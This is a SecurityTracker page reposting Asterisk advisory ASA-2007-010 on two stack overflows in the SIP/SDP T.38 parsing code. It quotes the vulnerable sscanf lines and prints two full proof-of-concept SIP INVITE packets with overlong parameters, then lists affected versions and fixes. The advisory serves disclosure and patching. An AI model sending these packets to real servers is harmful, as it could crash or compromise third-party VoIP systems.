SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (VoIP)  >   Asterisk Vendors:   Digium (Linux Support Services)
Asterisk Buffer Overflow in SIP/SDP T.38 Support Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1017951
SecurityTracker URL:  http://securitytracker.com/id/1017951
CVE Reference:   CVE-2007-2293   (Links to External Site)
Updated:  May 12 2008
Original Entry Date:  Apr 25 2007
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.4.x prior to 1.4.3
Description:   A vulnerability was reported in Asterisk. A remote user can execute arbitrary code on the target system.

A remote user can send specially crafted T38FaxRateManagement and T38FaxUdpEC SDP parameters to trigger one of two stack overflows in the T.38 SDP parsing code and execute arbitrary code on the target system. The code will run with the privileges of the target service.

T.38 support is not enabled by default.

AsteriskNOW and the Asterisk Appliance Developer Kit are affected.

The vendor was notified on March 22, 2007.

Barrie Dempster of NGS Software discovered this vulnerability.

Impact:   A remote user can execute arbitrary code on the target system.
Solution:   The vendor has issued a fixed version (1.4.3), available at:

ftp://ftp.digium.com/pub/telephony/asterisk

For AsteriskNOW, the fix is included in Beta 6.

For the Asterisk Appliance, the fix is included in version 0.4.0.

The Asterisk advisory is available at:

http://www.asterisk.org/files/ASA-2007-010.pdf

Vendor URL:  www.asterisk.org/ (Links to External Site)
Cause:   Boundary error
Underlying OS:   Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Date:  Tue, 24 Apr 2007 18:20:26 -0500
Subject:  [Full-disclosure] ASA-2007-010: Two stack buffer overflows in SIP

>                Asterisk Project Security Advisory - ASA-2007-010
> 
>    +------------------------------------------------------------------------+
>    |      Product       | Asterisk                                          |
>    |--------------------+---------------------------------------------------|
>    |      Summary       | Two stack buffer overflows in SIP channel's T.38  |
>    |                    | SDP parsing code                                  |
>    |--------------------+---------------------------------------------------|
>    | Nature of Advisory | Exploitable Stack Buffer Overflow                 |
>    |--------------------+---------------------------------------------------|
>    |   Susceptibility   | Remote Unauthenticated Sessions                   |
>    |--------------------+---------------------------------------------------|
>    |      Severity      | Moderate                                          |
>    |--------------------+---------------------------------------------------|
>    |   Exploits Known   | No                                                |
>    |--------------------+---------------------------------------------------|
>    |    Reported On     | March 22, 2007                                    |
>    |--------------------+---------------------------------------------------|
>    |    Reported By     | Barrie Dempster, NGS Software,                    |
>    |                    | <barrie@ngssoftware.com>                          |
>    |--------------------+---------------------------------------------------|
>    |     Posted On      | April 24, 2007                                    |
>    |--------------------+---------------------------------------------------|
>    |  Last Updated On   | April 24, 2007                                    |
>    |--------------------+---------------------------------------------------|
>    |  Advisory Contact  | kpfleming@digium.com                              |
>    +------------------------------------------------------------------------+
> 
> +------------------------------------------------------------------------------------+
> |Description|Two closely related stack based buffer overflows exist in the SIP/SDP   |
> |           |handler of Asterisk, the vulnerabilities are very similar but exist as  |
> |           |two separate unsafe function calls. The T38FaxRateManagement and        |
> |           |T38FaxUdpEC SDP parameters can be exploited remotely leading to         |
> |           |arbitrary code execution without authentication. In order for these     |
> |           |overflows to occur, t38 fax over SIP must be enabled in sip.conf.       |
> |           |Examples of SIP INVITE packets are shown below, however these           |
> |           |vulnerabilities can be triggered with a number of different SIP messages|
> |           |affecting calls received by Asterisk, or in response to calls made by   |
> |           |Asterisk.                                                               |
> |           |                                                                        |
> |           |Remote Unauthenticated stack overflow in Asterisk SIP/SDP               |
> |           |T38FaxRateManagement parameter                                          |
> |           |                                                                        |
> |           |A remote unauthenticated stack overflow exists in the SIP/SDP handler of|
> |           |Asterisk. By sending a SIP packet with SDP data which includes an overly|
> |           |long T38 parameter it is possible to overflow a stack based buffer and  |
> |           |execute arbitrary code.                                                 |
> |           |                                                                        |
> |           |The process_sdp function of chan_sip.c in Asterisk contains the         |
> |           |following vulnerable call to sscanf.                                    |
> |           |                                                                        |
> |           |else if ((sscanf(a, "T38FaxRateManagement:%s", s) == 1)) {              |
> |           |                                                                        |
> |           |found = 1;                                                              |
> |           |                                                                        |
> |           |if (option_debug > 2)                                                   |
> |           |                                                                        |
> |           |ast_log(LOG_DEBUG, "RateMangement: %s\n", s);                           |
> |           |                                                                        |
> |           |if (!strcasecmp(s, "localTCF"))                                         |
> |           |                                                                        |
> |           |peert38capability |=                                                    |
> |           |                                                                        |
> |           |T38FAX_RATE_MANAGEMENT_LOCAL_TCF;                                       |
> |           |                                                                        |
> |           |else if (!strcasecmp(s, "transferredTCF"))                              |
> |           |                                                                        |
> |           |peert38capability |=                                                    |
> |           |                                                                        |
> |           |T38FAX_RATE_MANAGEMENT_TRANSFERED_TCF;                                  |
> |           |                                                                        |
> |           |This attempts to read the "T38FaxRateManagement:" option from the SDP   |
> |           |within a SIP packet and copy the succeeding string into "s". There are  |
> |           |no checks on the length of this string and we can therefore write past  |
> |           |the boundaries of the "s" variable overwriting adjacent memory on the   |
> |           |stack. "s" is defined earlier in this function as being a character     |
> |           |array of only 256 bytes. The following example packet demonstrates an   |
> |           |overflow of this parameter:                                             |
> |           |                                                                        |
> |           |INVITE sip:200@127.0.0.1 SIP/2.0                                        |
> |           |                                                                        |
> |           |Date: Wed, 21 Mar 2007 4:20:09 GMT                                      |
> |           |                                                                        |
> |           |CSeq: 1 INVITE                                                          |
> |           |                                                                        |
> |           |Via: SIP/2.0/UDP                                                        |
> |           |                                                                        |
> |           |10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport|
> |           |                                                                        |
> |           |User-Agent: NGS/2.0                                                     |
> |           |                                                                        |
> |           |From: "Barrie Dempster"                                                 |
> |           |                                                                        |
> |           |<sip:zeedo@10.0.0.123:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672    |
> |           |                                                                        |
> |           |Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades                  |
> |           |                                                                        |
> |           |To: <sip:200@localhost>                                                 |
> |           |                                                                        |
> |           |Contact: <sip:zeedo@10.0.0.123:5068;transport=udp>                      |
> |           |                                                                        |
> |           |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE               |
> |           |                                                                        |
> |           |Content-Type: application/sdp                                           |
> |           |                                                                        |
> |           |Content-Length: 796                                                     |
> |           |                                                                        |
> |           |Max-Forwards: 70                                                        |
> |           |                                                                        |
> |           |v=0                                                                     |
> |           |                                                                        |
> |           |o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1           |
> |           |                                                                        |
> |           |s=-                                                                     |
> |           |                                                                        |
> |           |c=IN IP4 127.0.0.1                                                      |
> |           |                                                                        |
> |           |t=0 0                                                                   |
> |           |                                                                        |
> |           |m=image 5004 UDPTL t38                                                  |
> |           |                                                                        |
> |           |a=T38FaxVersion:0                                                       |
> |           |                                                                        |
> |           |a=T38MaxBitRate:14400                                                   |
> |           |                                                                        |
> |           |a=T38FaxMaxBuffer:1024                                                  |
> |           |                                                                        |
> |           |a=T38FaxMaxDatagram:238                                                 |
> |           |                                                                        |
> |           |a=T38FaxRateManagement:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA     |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAA                                                        |
> |           |                                                                        |
> |           |a=T38FaxUdpEC:t38UDPRedundancy                                          |
> |           |                                                                        |
> |           |-------------------------------------------------                       |
> |           |                                                                        |
> |           |Remote Unauthenticated stack overflow in Asterisk SIP/SDP T38FaxUdpEC   |
> |           |parameter                                                               |
> |           |                                                                        |
> |           |A remote unauthenticated stack overflow exists in the SIP/SDP handler of|
> |           |Asterisk. By sending a SIP packet with SDP data which includes an overly|
> |           |long T38FaxUdpEC parameter it is possible to overflow a stack based     |
> |           |buffer and execute arbitrary code.                                      |
> |           |                                                                        |
> |           |The process_sdp function of chan_sip.c in Asterisk contains the         |
> |           |following vulnerable call to sscanf.                                    |
> |           |                                                                        |
> |           |else if ((sscanf(a, "T38FaxUdpEC:%s", s) == 1)) {                       |
> |           |                                                                        |
> |           |found = 1;                                                              |
> |           |                                                                        |
> |           |if (option_debug > 2)                                                   |
> |           |                                                                        |
> |           |ast_log(LOG_DEBUG, "UDP EC: %s\n", s);                                  |
> |           |                                                                        |
> |           |if (!strcasecmp(s, "t38UDPRedundancy")) {                               |
> |           |                                                                        |
> |           |peert38capability |=                                                    |
> |           |                                                                        |
> |           |T38FAX_UDP_EC_REDUNDANCY;                                               |
> |           |                                                                        |
> |           |ast_udptl_set_error_correction_scheme(p->udptl,                         |
> |           |                                                                        |
> |           |UDPTL_ERROR_CORRECTION_REDUNDANCY);                                     |
> |           |                                                                        |
> |           |This attempts to read the "T38FaxUdpEC:" option from the SDP within a   |
> |           |SIP packet and copy the succeeding string into "s". There are no checks |
> |           |on the length of this string and we can therefore write past the        |
> |           |boundaries of the "s" variable overwriting adjacent memory on the stack.|
> |           |"s" is defined earlier in this function as being a character array of   |
> |           |only 256 bytes. The following example packet demonstrates an overflow of|
> |           |this parameter:                                                         |
> |           |                                                                        |
> |           |INVITE sip:200@127.0.0.1 SIP/2.0                                        |
> |           |                                                                        |
> |           |Date: Wed, 21 Mar 2007 4:20:09 GMT                                      |
> |           |                                                                        |
> |           |CSeq: 1 INVITE                                                          |
> |           |                                                                        |
> |           |Via: SIP/2.0/UDP                                                        |
> |           |                                                                        |
> |           |10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport|
> |           |                                                                        |
> |           |User-Agent: NGS/2.0                                                     |
> |           |                                                                        |
> |           |From: "Barrie Dempster"                                                 |
> |           |                                                                        |
> |           |<sip:zeedo@10.0.0.123:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672    |
> |           |                                                                        |
> |           |Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades                  |
> |           |                                                                        |
> |           |To: <sip:200@localhost>                                                 |
> |           |                                                                        |
> |           |Contact: <sip:zeedo@10.0.0.123:5068;transport=udp>                      |
> |           |                                                                        |
> |           |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE               |
> |           |                                                                        |
> |           |Content-Type: application/sdp                                           |
> |           |                                                                        |
> |           |Content-Length: 796                                                     |
> |           |                                                                        |
> |           |Max-Forwards: 70                                                        |
> |           |                                                                        |
> |           |v=0                                                                     |
> |           |                                                                        |
> |           |o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1           |
> |           |                                                                        |
> |           |s=-                                                                     |
> |           |                                                                        |
> |           |c=IN IP4 127.0.0.1                                                      |
> |           |                                                                        |
> |           |t=0 0                                                                   |
> |           |                                                                        |
> |           |m=image 5004 UDPTL t38                                                  |
> |           |                                                                        |
> |           |a=T38FaxVersion:0                                                       |
> |           |                                                                        |
> |           |a=T38MaxBitRate:14400                                                   |
> |           |                                                                        |
> |           |a=T38FaxMaxBuffer:1024                                                  |
> |           |                                                                        |
> |           |a=T38FaxMaxDatagram:238                                                 |
> |           |                                                                        |
> |           |a=T38FaxUdpEC:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA       |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAA                                                               |
> +------------------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    | Resolution | T.38 support in the affected versions of Asterisk is not  |
>    |            | enabled by default, therefore the severity of this issue  |
>    |            | is 'moderate'.                                            |
>    |            |                                                           |
>    |            | Users who are using the default configuration with        |
>    |            | 't38_udptl' set to 'no' or an equivalent value are not    |
>    |            | susceptible to this vulnerability. Users who have set     |
>    |            | this configuration item to 'yes' or an equivalent value   |
>    |            | but are not actually using T.38 support can set it to     |
>    |            | 'no' to secure their systems against this vulnerability.  |
>    |            |                                                           |
>    |            | All other users are urged to upgrade to the appropriate   |
>    |            | version of their Asterisk product listed in the           |
>    |            | 'Corrected In' section below.                             |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    |                           Affected Versions                            |
>    |------------------------------------------------------------------------|
>    |           Product            |   Release   |                           |
>    |                              |   Series    |                           |
>    |------------------------------+-------------+---------------------------|
>    |     Asterisk Open Source     |    1.0.x    | not affected; does not    |
>    |                              |             | contain T.38 support      |
>    |------------------------------+-------------+---------------------------|
>    |     Asterisk Open Source     |    1.2.x    | not affected, does not    |
>    |                              |             | contain T.38 support      |
>    |------------------------------+-------------+---------------------------|
>    |     Asterisk Open Source     |    1.4.x    | all releases prior to     |
>    |                              |             | 1.4.3                     |
>    |------------------------------+-------------+---------------------------|
>    |  Asterisk Business Edition   |    A.x.x    | not affected, does not    |
>    |                              |             | contain T.38 support      |
>    |------------------------------+-------------+---------------------------|
>    |  Asterisk Business Edition   |    B.x.x    | not affected, does not    |
>    |                              |             | contain T.38 support      |
>    |------------------------------+-------------+---------------------------|
>    |         AsteriskNOW          | pre-release | all releases prior to and |
>    |                              |             | including Beta 5          |
>    |------------------------------+-------------+---------------------------|
>    | Asterisk Appliance Developer |    0.x.x    | all releases prior to     |
>    |             Kit              |             | 0.4.0                     |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    |                              Corrected In                              |
>    |------------------------------------------------------------------------|
>    |      Product       |                      Release                      |
>    |--------------------+---------------------------------------------------|
>    |   Asterisk Open    |               1.4.3, available from               |
>    |       Source       |    ftp://ftp.digium.com/pub/telephony/asterisk    |
>    |--------------------+---------------------------------------------------|
>    |    AsteriskNOW     |            Beta 6, when available from            |
>    |                    | http://www.asterisknow.org, Beta 5 users can use  |
>    |                    |   use 'System Update' in the appliance control    |
>    |                    |   panel to update their version of AsteriskNOW    |
>    |--------------------+---------------------------------------------------|
>    | Asterisk Appliance |               0.4.0, available from               |
>    |   Developer Kit    |      ftp://ftp.digium.com/pub/telephony/aadk      |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    |        Links         |                                                 |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    | Asterisk Project Security Advisories are posted at                     |
>    | http://www.asterisk.org/security.                                      |
>    |                                                                        |
>    | This document may be superseded by later versions; if so, the latest   |
>    | version will be posted at                                              |
>    | http://www.asterisk.org/files/ASA-2007-010.pdf.                        |
>    +------------------------------------------------------------------------+
> 
>                Asterisk Project Security Advisory - ASA-2007-010
>               Copyright (c) 2007 Digium, Inc. All Rights Reserved.
>   Permission is hereby granted to distribute and publish this advisory in its
>                            original, unaltered form.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC